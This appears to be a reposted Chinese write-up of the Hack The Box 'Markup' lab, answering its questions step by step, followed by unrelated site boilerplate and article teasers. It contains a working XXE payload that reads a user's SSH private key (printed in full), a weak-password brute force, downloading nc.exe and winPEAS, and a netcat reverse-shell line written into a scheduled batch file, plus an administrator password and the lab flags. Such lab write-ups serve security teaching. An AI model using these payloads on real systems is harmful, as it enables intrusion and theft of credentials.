HTB:Markup[WriteUP]

目录

连接至HTB服务器并启动靶机

1.What version of Apache is running on the target's port 80?

2.What username:password combination logs in successfully?

使用Yakit并使用TOP1000字典对密码进行爆破

3.What is the word at the top of the page that accepts user input?

4.What XML version is used on the target?

5.What does the XXE / XEE attack acronym stand for?

6.What username can we find on the webpage's HTML code?

7.What is the file located in the Log-Management folder on the target?

Windows中SSH私钥一般都存储在用户目录下的.ssh目录中,使用以下payload

8.What executable is mentioned in the file mentioned before?

Submit user flag

USER_FLAG:032d2fc8952a8c24e39c8f0ee9918ef7

Submit root flag

在本地使用python开启http.server服务,尝试将NC、winPEAS上传至靶机

这里也可以使用winPEAS工具进行内部信息搜集

ROOT_FLAG:f574a3e7650cebd8c39784299cb570f8


连接至HTB服务器并启动靶机

靶机IP:10.129.24.29

分配IP:10.10.16.12


1.What version of Apache is running on the target's port 80?

使用nmap对靶机80端口进行服务信息扫描:

nmap -sV -p 80 {TARGET_IP}

由nmap扫描结果可见,VERSION栏目下的版本信息:2.4.41


2.What username:password combination logs in successfully?

使用浏览器对靶机80端口URL登录:http://{TARGET_IP}

使用Yakit并使用TOP1000字典对密码进行爆破

账户:admin

密码:password

所以用户名与密码组合为:admin:password


3.What is the word at the top of the page that accepts user input?

进入home.php页面:

点击顶部Order选项,此页面允许接受来自用户的输入:


4.What XML version is used on the target?

Order页面中随便填写数据,点击Submit数据上传:

使用Yakit或者BurpSuite对该数据包进行抓包:

从该请求包可以看到,靶机使用的XML版本为:1.0


5.What does the XXE / XEE attack acronym stand for?

XXE/XEE 的英文全称为 XML External Entity,即 XML 外部实体。

XXE 攻击是针对解析 XML 输入的应用程序的一种攻击方式。攻击者可以通过构造恶意的 XML 输入,利用应用程序解析 XML 时处理外部实体的机制,来读取服务器上的敏感文件、执行系统命令、进行内网探测等恶意操作。XXE 攻击的危害较大,可能导致敏感信息泄露、服务器被控制等严重后果。为了防范 XXE 攻击,可以采取禁用外部实体、对用户输入进行严格的验证和过滤等措施。


6.What username can we find on the webpage's HTML code?

services.php页面下,按Ctrl+U查看网页HTML源码:

在注释处可以看到一个用户名:Daniel


7.What is the file located in the Log-Management folder on the target?

尝试进行XXE外部实体注入攻击查找并获取Daniel的SSH私钥:

Windows中SSH私钥一般都存储在用户目录下的.ssh目录中,使用以下payload

<?xml version="1.0" ?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:c:/users/daniel/.ssh/id_rsa'>]>
<order><quantity>5</quantity><item>&test;</item><address>666</address></order>

发送请求后,获得回显:

拷贝id_rsa文件内容如下:

Your order for -----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEArJgaPRF5S49ZB+Ql8cOhnURSOZ4nVYRSnPXo6FIe9JnhVRrdEiMi
QZoKVCX6hIWp7I0BzN3o094nWInXYqh2oz5ijBqrn+NVlDYgGOtzQWLhW7MKsAvMpqM0fg
HYC5nup5qM8LYDyhLQ56j8jq5mhvEspgcDdGRy31pljOQSYDeAKVfiTOOMznyOdY/Klt6+
…-----END OPENSSH PRIVATE KEY-----
 has been processed

在本地创建一个id_rsa文件,并将内容写入:

touch id_rsa

对该私钥文件修改为600权限,使其符合SSH的保护要求: 

chmod 600 id_rsa

将秘钥内容写入:

echo "-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----">id_rsa

使用SSH连接至靶机daniel用户:

ssh -i id_rsa daniel@{TARGET_IP}

在C盘根目录下,找到了Log_Management文件夹:

列出该文件夹内所有文件:

dir C:\Log-Management

可见该文件夹内仅存在一个:job.bat文件


8.What executable is mentioned in the file mentioned before?

进入C:\Log-Management目录中,并使用type命令查看job.bat文件内容:

cd C:\Log-Management
type job.bat

可见在该bat文件中,运行了wevtutil.exe文件


Submit user flag

在daniel用户的桌面上可以找到flag.txt文件,查看其内容:

USER_FLAG:032d2fc8952a8c24e39c8f0ee9918ef7


Submit root flag

使用icacls命令查看job.bat文件权限设置:

通过输出结果可见,BUILTIN为所有本地用户,具备完全控制权限(F)

这意味着我们对该文件可以随意读写

在本地使用python开启http.server服务,尝试将NC、winPEAS上传至靶机

在靶机启动powershell,并使用wget命令将本地文件下载至靶机:

wget http://{NATIVE_IP}:6666/nc.exe -outfile nc.exe
wget http://{NATIVE_IP}:6666/winPEASx64.exe -outfile winPEASx64.exe

将nc反弹shell命令写入job.nat文件中:

echo C:\Log-Management\nc.exe -e cmd.exe {NATIVE_IP} {NATIVE_PORT} > job.bat

在本地启用nc监听:

nc -lvnp {NATIVE_PORT}

因为job.bat文件在靶机系统将计划执行,所以只需要一直等(可能有点久)就会有反弹shell

不知道什么原因job.bat文件的内容一直被覆写,所以nc反弹shell这里可能需要多尝试几次

这里也可以使用winPEAS工具进行内部信息搜集

.\winPEASx64.exe

直接可以拿到管理用用户凭证:

账户:Administrator

密码:Yhk}QE&j<3M

直接使用该账户密码进行SSH服务登录:

ssh Administrator@{TARGET_IP}

也是顺利拿到了管理员权限,接下来也是在Administrator用户桌面下找到了root.txt

ROOT_FLAG:f574a3e7650cebd8c39784299cb570f8

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/1558859.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

Python基础之List列表用法

1、创建列表 names ["张三","李四","王五","Mary"] 2、列表分片 names[1]&#xff1a;获取数组的第2个元素。 names[1:3]&#xff1a;获取数组的第2、第3个元素。包含左侧&#xff0c;不包含右侧。 names[:3]等同于names[0:3]&…

AD中显示Selection includes locked items.Continue?

因为框选拖动组里包含锁定的元器件&#xff0c;所以出现如下提示&#xff1b; 可以单击锁定元器件&#xff0c;点击location的锁形标记即可显示解锁的状态。 解锁之后&#xff1a; 然后就可以拖动框选的元器件了。

项目管理系统:提升企业项目管理效率的关键

随着市场的快速变化和企业业务的日益复杂&#xff0c;项目管理已成为企业成功的关键因素。但现阶段&#xff0c;企业项目管理正遭遇诸多棘手的挑战&#xff0c;让项目的实施充满不确定性。好在项目管理系统应运而生&#xff0c;为企业带来了新的希望和转机。但面对琳琅满目的项…

天津自闭症孩子寄宿制学校:关注每个孩子的成长与幸福

自闭症&#xff0c;这一复杂且日益受到关注的神经发育障碍&#xff0c;给患儿及其家庭带来了诸多挑战。在天津及全国范围内&#xff0c;越来越多的自闭症寄宿学校应运而生&#xff0c;致力于为这些特殊孩子提供全面的教育、康复和生活支持。而在遥远的广州&#xff0c;星贝育园…

【万字长文】Word2Vec计算详解(三)分层Softmax与负采样

【万字长文】Word2Vec计算详解&#xff08;三&#xff09;分层Softmax与负采样 写在前面 第三部分介绍Word2Vec模型的两种优化方案。 【万字长文】Word2Vec计算详解&#xff08;一&#xff09;CBOW模型 markdown行 9000 【万字长文】Word2Vec计算详解&#xff08;二&#xff0…

ComfyUI【基础篇】:小白都可以学会的ComfyUI安装教程(原生版安装包)

大家我是极客菌&#xff01;&#xff01;&#xff01;&#xff01; 自从Flux这一款最新黑马文生图模型推出以来&#xff0c;Flux的浪潮正以不可阻挡之势席卷全球&#xff0c;目前本地电脑环境要玩Flux, 支持方式主要是ComfyUI。但是ComfyUI工具安装一直是很多小白比较困惑的地…

C++ 非STL数据结构学习——1.2 并查集

并查集的基本原理&#xff1a;四海之内的人&#xff0c;通过祖宗放在关联在一起。 例如&#xff0c;A的祖宗是B&#xff0c;B的祖宗又是C&#xff0c;D的祖宗若是C&#xff0c;则认为A和C就是一个集合的。 也就是说&#xff0c;每个元素有自己的祖宗信息&#xff0c;如果两元…

磁盘整理工具 IObit Smart Defrag Pro 免安装版

IObit Smart Defrag Pro 是一款功能强大的磁盘碎片整理工具。IObit Smart Defrag Pro最新版具有世界领先的碎片整理能力&#xff0c;IObit Smart Defrag Pro最新版不仅可以提供碎片整理功能&#xff0c;还可以根据使用频率智能地简化文件&#xff0c;从而加快磁盘速度并提高整个…

UR5机器人DH参数及其雅克比矩阵

UR5机器人有6个旋转关节&#xff08;R关节&#xff09;&#xff0c;其DH参数如下&#xff1a; 关节 iiiaia_iai​ (m)did_idi​ (m)αi\alpha_iαi​ (rad)θi\theta_iθi​ (rad)100.089159π2\frac{\pi}{2}2π​θ1\theta_1θ1​2-0.42500θ2\theta_2θ2​3-0.3922500θ3\th…

基于vue框架的大学生职业测评系统j8ag1(程序+源码+数据库+调试部署+开发环境)系统界面在最后面。

系统程序文件列表 项目功能&#xff1a;学生,职业探索,职业分类,自我认知,绿色未来,测评报告 开题报告内容 基于Vue框架的大学生职业测评系统项目功能主要包括以下几个方面&#xff1a; 一、核心功能 学生信息管理 记录并管理学生的基本信息&#xff0c;如姓名、性别、年龄、…

MySQL五千万大表查询优化实战

背景 DBA同事在钉钉发了两张告警截图&#xff0c;作为“始作俑者”的我很心虚&#xff0c;因为刚才是我在管理后台查询数据&#xff0c;结果很久都没出来&#xff0c;并且用多个维度查了N次 问题分析 这是当天上线的功能&#xff0c;完事我立马锁定SQL然后开启排查 # 原SQL&a…

LED灯具分割系统源码&数据集分享

LED灯具分割系统源码&#xff06;数据集分享 [yolov8-seg-EfficientRepBiPAN&#xff06;yolov8-seg-dyhead等50全套改进创新点发刊_一键训练教程_Web前端展示] 1.研究背景与意义 项目参考ILSVRC ImageNet Large Scale Visual Recognition Challenge 项目来源AAAI Global A…

Docker SDK for Python 交互

目录 1. 创建 Docker 客户端 2. 列出所有容器 3. 容器内执行命令 4. 启动和停止容器 5. 创建和运行新容器 6. 获取容器日志 7. 删除容器 8. 处理镜像 使用 Docker SDK for Python 进行交互非常方便&#xff0c;可以执行各种操作&#xff0c;如管理容器、镜像、网络等。…

科学化润滑方案:满足不同微型导轨需求的润滑策略!

随着工业4.0时代的到来&#xff0c;自动化、智能化生产已成为制造业发展的主流趋势。微型导轨以其高精度、高刚性、长寿命等优异性能&#xff0c;广泛应用于电子设备、医疗器械、精密仪器等领域。而润滑作为微型导轨性能的重要保障&#xff0c;直接关系到微型导轨的运行效果和寿…

界面控件DevExpress中文教程 - 如何拓展具有AI功能的文本编辑器(一)

本文重点介绍了DevExpress在近年来最热门领域——人工智能(AI)和自然语言处理(NLP)的改进&#xff01; NLP是人工智能的一个分支&#xff0c;它允许计算机与人类语言进行交互&#xff0c;这包括以有意义/有用的方式理解、解释、生成和回应文本(和语音)的能力。基于NLP的功能允…

Run the FPGA VI 选项的作用

Run the FPGA VI 选项的作用是决定当主机 VI 运行时&#xff0c;FPGA VI 是否会自动运行。 具体作用&#xff1a; 勾选 “Run the FPGA VI”&#xff1a; 当主机 VI 执行时&#xff0c;如果 FPGA VI 没有正在运行&#xff0c;系统将自动启动并运行该 FPGA VI。 这可以确保 FPG…

设计模式——门面模式 | 外观模式

哈喽&#xff0c;各位盆友们&#xff01;我是你们亲爱的学徒小z&#xff0c;今天给大家分享的文章是设计模式的——门面模式。 文章目录 定义通用类图1.通用结构2.优点3.缺点 使用场景注意事项1.一个子系统可以有多个门面2.门面不参与子系统内的业务逻辑 定义 定义&#xff1a;…

为Floorp浏览器添加搜索引擎及搜索栏相关设置. 2024-10-08

Floorp浏览器开源项目地址: https://github.com/floorp-Projects/floorp/ 以下内容同样适用于firefox和大部分基于firefox的桌面版浏览器 1.第一步 为Floorp浏览器添加搜索栏 (1.工具栏空白处 次键选择 定制工具栏 (2. 把 搜索框 拖动至工具栏 2.添加搜索引擎 以添加 搜狗搜索…

双十一买什么?双十一买什么东西最划算?超全双十一购物指南!

双十一即将到来&#xff0c;一年一度的购物狂欢盛宴再度开启&#xff01;在海量的商品面前&#xff0c;怎样挑选出既心仪又实惠的好物&#xff0c;已然成为大家关注的重点。下面为您呈上一份极为全面的2024年双十一必买清单&#xff0c;助力您轻松购物&#xff0c;收获满满&…